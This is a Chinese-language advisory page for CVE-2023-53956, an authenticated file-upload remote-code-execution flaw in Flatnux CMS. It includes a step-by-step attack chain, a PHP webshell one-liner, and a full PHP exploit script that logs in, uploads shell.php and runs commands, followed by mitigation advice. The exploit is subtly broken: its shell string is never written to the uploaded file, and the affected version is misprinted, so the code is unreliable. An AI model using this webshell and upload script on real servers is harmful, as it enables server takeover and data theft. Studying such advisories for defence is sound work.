CVE-2023-53956 Flatnux文件上传漏洞导致远程代码执行

漏洞信息

漏洞编号

CVE-2023-53956

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Flatnux CMS

漏洞概述

CVE-2023-53956是Flatnux CMS中的一个严重安全漏洞，存在于2021-03-25版本。该漏洞属于经过身份验证的文件上传漏洞，允许具有管理员权限的用户通过文件管理器功能上传任意PHP文件。攻击者利用此漏洞可以上传恶意PHP脚本到Web根目录，从而在服务器上执行任意代码，实现远程代码执行（RCE）。由于该漏洞需要管理员认证才能利用，因此攻击门槛相对较高，但在获取管理员凭证后，攻击者可以完全控制目标服务器。CVSS评分8.8分，属于高危漏洞，对系统机密性、完整性和可用性均造成严重影响。Flatnux是一款基于PHP的内容管理系统，该漏洞的存在使得使用该系统的组织面临严重的安全风险。

技术细节

该漏洞的根本原因在于Flatnux CMS的文件管理器模块对上传文件缺乏有效的安全验证。具体问题包括：1) 文件类型检查不严格：系统未对上传文件的MIME类型和扩展名进行严格的验证，允许.php等可执行文件格式上传；2) 上传目录可执行：上传的文件被保存在Web可访问的目录中，且没有设置适当的文件执行权限限制；3) 缺少文件名安全处理：上传的文件名未经sanitization，可能存在路径遍历风险。攻击者首先需要获取Flatnux管理员账户的访问权限，然后通过文件管理器功能上传精心构造的PHP webshell。由于CMS通常将上传目录设置为Web可访问路径，攻击者可以直接通过HTTP请求访问并执行上传的恶意脚本，从而在服务器上执行任意系统命令。

攻击链分析

STEP 1

步骤1

获取管理员凭证：攻击者通过暴力破解、社会工程学或其他方式获取Flatnux CMS的管理员账户用户名和密码

STEP 2

步骤2

登录管理后台：使用获取的管理员凭证登录Flatnux CMS管理面板

STEP 3

步骤3

访问文件管理器：导航到文件管理器模块，该模块通常位于管理后台的相应功能区域

STEP 4

步骤4

上传恶意PHP文件：构造包含webshell代码的PHP文件（如<?php system($_GET['cmd']); ?>），通过文件管理器上传功能将其上传到Web目录

STEP 5

步骤5

触发代码执行：通过HTTP请求访问上传的PHP文件，并传递恶意参数执行任意系统命令

STEP 6

步骤6

完全控制服务器：利用远程代码执行能力，进一步渗透内网、窃取数据或部署后门程序

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php // CVE-2023-53956 PoC - Flatnux Authenticated File Upload RCE // Target: Flatnux CMS <= 2021-03.25 // Author: VulnCheck ([email protected]) $target = "http://target.com/flatnux"; $username = "admin"; $password = "admin123"; // Step 1: Login to get session cookie $login_url = "$target/flatnux.php?mod=users&op=login"; $login_data = http_build_query([ 'user' => $username, 'pass' => $password, 'op' => 'login', 'mod' => 'users' ]); $ch = curl_init($login_url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $login_data); curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_exec($ch); curl_close($ch); // Step 2: Upload malicious PHP file via file manager $upload_url = "$target/flatnux.php?mod=filemanager&op=upload"; $php_shell = '<?php system($_GET["cmd"]); ?>'; $post_data = [ 'dir' => 'images', 'file' => new CURLFile('/tmp/shell.php', 'application/x-php', 'shell.php') ]; $ch = curl_init($upload_url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data); curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); // Step 3: Execute commands via uploaded shell $shell_url = "$target/images/shell.php?cmd=whoami"; $ch = curl_init($shell_url); curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); curl_close($ch); echo "RCE Result: $result"; ?>

影响范围

Flatnux CMS <= 2021-03-25

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1) 限制文件管理器功能的访问权限，仅允许受信任的管理员使用；2) 通过Web服务器配置禁止images、uploads等上传目录中的PHP文件执行；3) 启用双因素认证增强管理员账户安全；4) 监控Web访问日志，关注异常的文件上传和访问行为；5) 考虑暂时禁用文件管理器功能，直到漏洞被修复；6) 实施IP白名单限制，仅允许特定IP地址访问管理后台。